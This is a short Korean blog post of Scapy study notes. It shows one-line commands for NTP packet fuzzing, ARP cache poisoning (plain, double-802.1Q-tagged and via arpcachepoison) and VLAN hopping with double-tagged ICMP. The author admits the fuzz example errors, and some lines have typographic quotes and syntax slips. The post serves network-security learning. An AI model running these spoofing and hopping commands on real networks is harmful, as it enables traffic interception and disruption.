Self-Improvement

Scapy 사용법 7 (간단한 fuzz, ARP cache poisoning, VLAN Hopping) 본문

scapy

Scapy 사용법 7 (간단한 fuzz, ARP cache poisoning, VLAN Hopping)

JoGeun 2018. 10. 22. 16:39

*예제


>>> send(IP(dst=”192.168.10.1”)/fuzz(UDP()/NTP(version=4)(loop=1)))


일반적인 IP레이어로 퍼지패킷을 작성한 다음 퍼지 UDP 및 NTP 계층을 대상으로 UDP 체크섬이 올바르고 UDP 대상 포트가 NTP에 의해 과부하 되어 123이 되고 NTP 버전이 강제로 버전 4가 되는 것???


※ 오류나서 나중에 다시 알아봐야함.



*예제


>>>send( Ether(dst=clientMAC)/ARP(op=”who-has”, psrc=gateway, pdst=client). inter=RandNum(10,40), loop=1)

=클래식 ARP cache poisoning


>>> send( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2) /ARP(op="who-has", psrc=gateway, pdst=client), inter=RandNum(10,40), loop=1 )

= ARP cache poisoning with double 802.1q encapsulation


>>>arpcachepoison(target, victim, interval=1)

= 쉽게 사용가능.




*예제


>>>  sendp(Ether()/Dot1Q(vlan=2)/Dot1Q(vlan=7)/IP(dst="192.168.10.1")/ICMP())



wireshark로 확인.